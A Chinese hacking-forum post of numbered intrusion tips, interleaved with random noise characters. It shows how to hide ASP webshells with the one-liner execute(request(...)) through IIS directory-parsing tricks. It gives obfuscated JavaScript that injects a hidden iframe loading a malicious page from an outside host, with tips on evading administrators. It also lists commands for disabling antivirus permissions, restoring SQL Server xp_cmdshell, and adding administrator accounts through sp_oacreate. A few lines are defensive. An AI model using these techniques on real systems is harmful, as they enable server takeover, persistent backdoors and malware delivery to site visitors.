: z: x1 l2 J4 l8 B& G. y9 X53、隐藏ASP后门的两种方法* Z! W; g1 o9 G- U' A" x
1、建立非标准目录:mkdir images..\; C1 L+ ]0 j: k
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
' M2 D0 K0 I" C( j# S通过web访问ASP木马:http://ip/images../news.asp?action=login
" M* |0 b0 A* ~" E8 [( s" n如何删除非标准目录:rmdir images..\ /s& @ g% A) w+ N
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:" Q& C+ |# s, ]1 U6 [2 i+ w& N
mkdir programme.asp
" f! [9 Z: S6 C新建1.txt文件内容:<!--#include file=”12.jpg”-->9 G& @+ q1 `0 I
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件7 z$ k( e1 c2 T( ~3 E4 F
attrib +H +S programme.asp$ ~4 ?* H7 y2 F% p7 P
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt8 x5 }6 D {+ L, I. B! i
( ~. q$ i1 ?! c5 l
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
4 b7 ?- Z* e2 d3 s* H7 y然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
6 S: y2 v" L# T; P& c/ e# j$ |, S- l& ?/ F
55、JS隐蔽挂马/ O* S. {- s/ ^! k K3 V
1.
# V) G2 \% N& V/ T1 Ivar tr4c3="<iframe src=ht";; q9 s# @2 g" o3 {' A/ S! g
tr4c3 = tr4c3+"tp:/";
/ {! j3 p; L/ S7 ]8 A ?tr4c3 = tr4c3+"/ww";
2 [9 a7 y& x$ {tr4c3 = tr4c3+"w.tr4";5 j! C& y3 X: {- b" _
tr4c3 = tr4c3+"c3.com/inc/m";3 `+ n `2 A9 B+ t7 Y: W' o: d) y# L
tr4c3 = tr4c3+"m.htm style="display:none"></i";6 m) L% C; e1 ? F5 K
tr4c3 =tr4c3+"frame>'";
# q. X l E5 L0 @) ?: w9 [! \document.write(tr4c3);
+ q$ j; [, a* I9 V5 G- p* I. t0 T: M避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。9 q$ U! L( s$ i$ Q
" a4 V- C' }6 F# z& z& }% O2.0 M$ Y; U# b; A9 [+ t( J; R
转换进制,然后用EVAL执行。如8 r! H% f) W! u8 J3 B* [( B
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");+ o6 e6 h8 c6 n, |3 X, F" w& ^
不过这个有点显眼。
0 \# T2 a7 r0 f. `0 \8 V M5 o3. K$ a0 ~' N6 u, r0 w" q1 r: q
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
! z+ ?2 i5 z' Q! n最后一点,别忘了把文件的时间也修改下。
- Q0 j" v" k K' F$ D& h! O" M; n
0 u; A7 e, T* u& @2 i# j `56.3389终端入侵常用DOS命令+ Y. \% ]& c7 s& t6 e7 n$ j% L
taskkill taskkill /PID 1248 /t( _- K5 Y0 E6 W/ u \
/ Y; ^* e6 i! O% K; ftasklist 查进程
# w" o/ ~/ R; Y F5 a% m' ]5 p
) c9 `. S. ]# R) x8 K- Bcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限* S, e8 `$ o4 v
iisreset /reboot( [8 V) `! ^: o7 O' c
tsshutdn /reboot /delay:1 重起服务器
5 R$ U# f. u1 d2 b
' p: {/ i$ f* P( p2 elogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,& @& F0 g3 d7 N! q. C) r
% j) W5 V% D, y: }( [, X
query user 查看当前终端用户在线情况* \6 o8 B9 E# u) ~$ j
9 S% ]- q( C* B/ U' O9 C! C要显示有关所有会话使用的进程的信息,请键入:query process * S, Y5 g% q5 `2 e7 y: }
$ y4 Z n3 H( H" Y+ n
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
; i- l( T1 m( X, J) z( ]8 e* g* ]
8 V% \/ V* J. n% E2 c2 H要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2' V: z! p! ]3 O( t' m, C5 d, t
7 u; m/ [5 E1 e
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
# S6 { R- x, a; a, l4 e: S Y1 e- r; I
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启/ J! ~# y6 T$ m. V, C2 y# |
3 B4 [9 |" u$ l( O- f命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统8 ~' O8 v: Y' u
' }" c( X- R* o5 C. X# }" m% w# z命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。: H {$ w6 F. |! I7 h
8 u2 m$ ?9 x. o* L4 B命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机. X9 O( M2 c9 I- P/ J
, a& S2 w2 M! [0 X' P
56、在地址栏或按Ctrl+O,输入:
4 b: G) l7 }$ m* w3 L4 c& Ojavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;) n8 M3 {8 L; o9 Z6 w! [* z
$ }2 {5 I( W8 j" V- X/ G8 R源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。, A0 q* [ S2 |; z! a4 F+ u+ O& `
9 J; J) R3 c) j57、net user的时候,是不能显示加$的用户,但是如果不处理的话,. B8 N) a) }# @. F
用net localgroup administrators是可以看到管理组下,加了$的用户的。4 V& N+ G4 X! J5 M* |6 a
8 ]& V8 ]$ x4 a: O* H58、 sa弱口令相关命令
- R- e$ _& d/ s0 w- \- {4 }' E* N# q8 y
一.更改sa口令方法:* @ Q; A7 X7 Q$ {3 d
用sql综合利用工具连接后,执行命令:$ n4 B3 B, B4 K0 z
exec sp_password NULL,'20001001','sa'
/ O+ Z d. }8 O. ~: l. `* ]) @(提示:慎用!)6 Z; A9 Y( R5 x
5 F5 }- j. h* V8 ?
二.简单修补sa弱口令.
; z9 w, X! U# ?) N* c: I* U1 U. P- j9 b- h. V. a0 m: u
方法1:查询分离器连接后执行:
- T- b& i2 S( f( ]5 S6 y, e8 Yif exists (select * from
+ B" j0 o4 |- M% X9 @( @dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
* w5 L0 O' [2 B. t, T$ O9 w/ HOBJECTPROPERTY(id, N'IsExtendedProc') = 1)5 F; `$ m+ D( B: x1 M K h" ]
6 N& `. }4 Y, r& r2 q }
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
! A: O* y1 ^9 J# u
/ G) L# W% ~5 e% H. A4 x3 C# ~GO$ R5 K& ]& [7 X* U
2 ?) z3 r) c* o4 n8 m: C; Q$ ~
然后按F5键命令执行完毕
2 O E9 X" l) u# G6 ^ ]1 ^( m3 I4 {9 Q5 H" Q
方法2:查询分离器连接后; g _; m z ~4 ]# {, j7 R
第一步执行:use master- F, u4 ]% a2 Y$ j
第二步执行:sp_dropextendedproc 'xp_cmdshell'7 }( X! z0 C& n) |9 A* ] I5 |
然后按F5键命令执行完毕1 L+ b( j2 P/ e+ i
$ p% e, t' x6 [* \) X1 [" P
3 r. b* M( _: I" C& `) ^/ a7 i# |
三.常见情况恢复执行xp_cmdshell.0 @& \$ I% U# C1 ^# O4 Q& C
' i4 H8 F3 ?1 p% d+ m' V& f) h( y9 z& ^, z: A
1 未能找到存储过程'master..xpcmdshell'.
3 Y, i2 @' r' _5 O3 @6 D2 H 恢复方法:查询分离器连接后,9 `! P) M+ _9 R0 v- @
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
& w/ M+ Z# K( ]( t& F2 _: E第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
" Y" H& X" o" T9 H5 t6 P# u% a然后按F5键命令执行完毕0 G8 H$ `0 A* `1 h4 @$ u
6 I ~' u; @) S2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)- ?$ U8 b% n, }( Y& [
恢复方法:查询分离器连接后,
1 T& v4 h. K* q2 @第一步执行:sp_dropextendedproc "xp_cmdshell"# `) K5 z9 }% \) w7 Q& x. h1 ]
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
2 F8 h. v" ?2 Q- |% w o然后按F5键命令执行完毕! y" j4 z2 t9 Z9 ^
7 B: U) R9 q8 I c; ^
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
: ]5 y2 g2 A# g X3 |6 w5 A恢复方法:查询分离器连接后,
, X& [$ U* ~5 d+ C$ S4 J* _/ v6 C第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
% f8 r+ ]7 N) k3 S" `第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
2 Y# w% }3 N& D; z然后按F5键命令执行完毕6 F$ n* W/ a1 C% g
1 t! L# U( J* u四.终极方法.9 a8 a7 f8 ^( E' K
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
2 s7 Y( K9 A# R, E, b查询分离器连接后,+ ?; V- Q+ e5 ~/ W3 C- c
2000servser系统:9 d4 i0 O6 x7 L
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
7 j5 j2 I6 d" ^4 Z1 v$ V4 Q- g: J$ _& ?9 ?5 P* V
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
' e; _, S7 P4 _. \" ~2 I
p( a: W4 t6 d2 yxp或2003server系统:
2 e7 G* r7 |, c" V
% ] [1 A* e( N2 m* odeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
; [/ T' f; g2 K' c. i
& `1 ^7 F/ a6 h. f) f3 Xdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add': Z/ N+ c- o+ J. b9 Z
|
发表于 2012-9-15 14:13:15
收藏
支持
反对